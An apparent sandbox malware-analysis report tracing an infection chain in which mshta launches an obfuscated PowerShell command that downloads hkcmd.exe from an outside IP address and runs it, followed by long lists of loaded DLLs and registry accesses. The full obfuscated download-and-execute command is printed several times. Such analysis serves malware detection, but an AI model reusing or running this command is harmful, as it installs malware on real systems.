                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWErsHelL.Exe -Ex bypASs -NOP -w 1 -c DEVICeCReDeNTiALdePloYmenT.eXE ; IeX($(iex('[sYSteM.tExt.eNcoDiNG]'+[CHAR]58+[cHAr]0x3A+'UTf8.geTsTRiNg([SYstem.cOnVeRt]'+[CHAR]0X3A+[cHaR]58+'fromBASe64sTrInG('+[CHar]0x22+'JGIySTFwOXZidlcxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTUJlUmRlZklOaXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQVhVQkhZLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRU5aemdQLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcnNxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpLS3dOalVuc3gpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJETFEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJDYUxKayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkYjJJMXA5dmJ2VzE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjcuMTgvMzQ2L2hrY21kLmV4ZSIsIiRlTlY6QVBQREFUQVxoa2NtZC5leGUiLDAsMCk7U1RBUnQtc2xlZVAoMyk7aW52T0tFLWl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXGhrY21kLmV4ZSI='+[cHar]0X22+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOWErsHelL.Exe -Ex bypASs -NOP -w 1 -c DEVICeCReDeNTiALdePloYmenT.eXE ; IeX($(iex('[sYSteM.tExt.eNcoDiNG]'+[CHAR]58+[cHAr]0x3A+'UTf8.geTsTRiNg([SYstem.cOnVeRt]'+[CHAR]0X3A+[cHaR]58+'fromBASe64sTrInG('+[CHar]0x22+'JGIySTFwOXZidlcxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTUJlUmRlZklOaXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQVhVQkhZLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRU5aemdQLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcnNxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpLS3dOalVuc3gpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJETFEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJDYUxKayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkYjJJMXA5dmJ2VzE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjcuMTgvMzQ2L2hrY21kLmV4ZSIsIiRlTlY6QVBQREFUQVxoa2NtZC5leGUiLDAsMCk7U1RBUnQtc2xlZVAoMyk7aW52T0tFLWl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXGhrY21kLmV4ZSI='+[cHar]0X22+'))')))"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sgkiriu3\sgkiriu3.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6A77.tmp" "c:\Users\user\AppData\Local\Temp\sgkiriu3\CSC38C97BC6FA854DE2B4DB5ADB17FE40F2.TMP"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\hkcmd.exe "C:\Users\user\AppData\Roaming\hkcmd.exe"
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\hkcmd.exe"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWErsHelL.Exe -Ex bypASs -NOP -w 1 -c DEVICeCReDeNTiALdePloYmenT.eXE ; IeX($(iex('[sYSteM.tExt.eNcoDiNG]'+[CHAR]58+[cHAr]0x3A+'UTf8.geTsTRiNg([SYstem.cOnVeRt]'+[CHAR]0X3A+[cHaR]58+'fromBASe64sTrInG('+[CHar]0x22+'JGIySTFwOXZidlcxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTUJlUmRlZklOaXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQVhVQkhZLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRU5aemdQLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcnNxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpLS3dOalVuc3gpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJETFEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJDYUxKayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkYjJJMXA5dmJ2VzE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjcuMTgvMzQ2L2hrY21kLmV4ZSIsIiRlTlY6QVBQREFUQVxoa2NtZC5leGUiLDAsMCk7U1RBUnQtc2xlZVAoMyk7aW52T0tFLWl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXGhrY21kLmV4ZSI='+[cHar]0X22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOWErsHelL.Exe -Ex bypASs -NOP -w 1 -c DEVICeCReDeNTiALdePloYmenT.eXE ; IeX($(iex('[sYSteM.tExt.eNcoDiNG]'+[CHAR]58+[cHAr]0x3A+'UTf8.geTsTRiNg([SYstem.cOnVeRt]'+[CHAR]0X3A+[cHaR]58+'fromBASe64sTrInG('+[CHar]0x22+'JGIySTFwOXZidlcxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTUJlUmRlZklOaXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQVhVQkhZLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRU5aemdQLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDcnNxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpLS3dOalVuc3gpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJETFEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJDYUxKayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkYjJJMXA5dmJ2VzE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjcuMTgvMzQ2L2hrY21kLmV4ZSIsIiRlTlY6QVBQREFUQVxoa2NtZC5leGUiLDAsMCk7U1RBUnQtc2xlZVAoMyk7aW52T0tFLWl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXGhrY21kLmV4ZSI='+[cHar]0X22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sgkiriu3\sgkiriu3.cmdline"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\hkcmd.exe "C:\Users\user\AppData\Roaming\hkcmd.exe" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6A77.tmp" "c:\Users\user\AppData\Local\Temp\sgkiriu3\CSC38C97BC6FA854DE2B4DB5ADB17FE40F2.TMP"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\hkcmd.exe" Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: Binary string: wntdll.pdbUGP source: hkcmd.exe, 0000000C.00000003.1317825955.0000000003DB0000.00000004.00001000.00020000.00000000.sdmp, hkcmd.exe, 0000000C.00000003.1316553254.0000000003C10000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: hkcmd.exe, 0000000C.00000003.1317825955.0000000003DB0000.00000004.00001000.00020000.00000000.sdmp, hkcmd.exe, 0000000C.00000003.1316553254.0000000003C10000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: q7C:\Users\user\AppData\Local\Temp\sgkiriu3\sgkiriu3.pdb source: powershell.exe, 00000003.00000002.1323680110.00000000049FB000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWErsHelL.Exe -Ex bypASs -NOP -w 1 -c DEVICeCReDeNTiALdePloYmenT.eXE ; 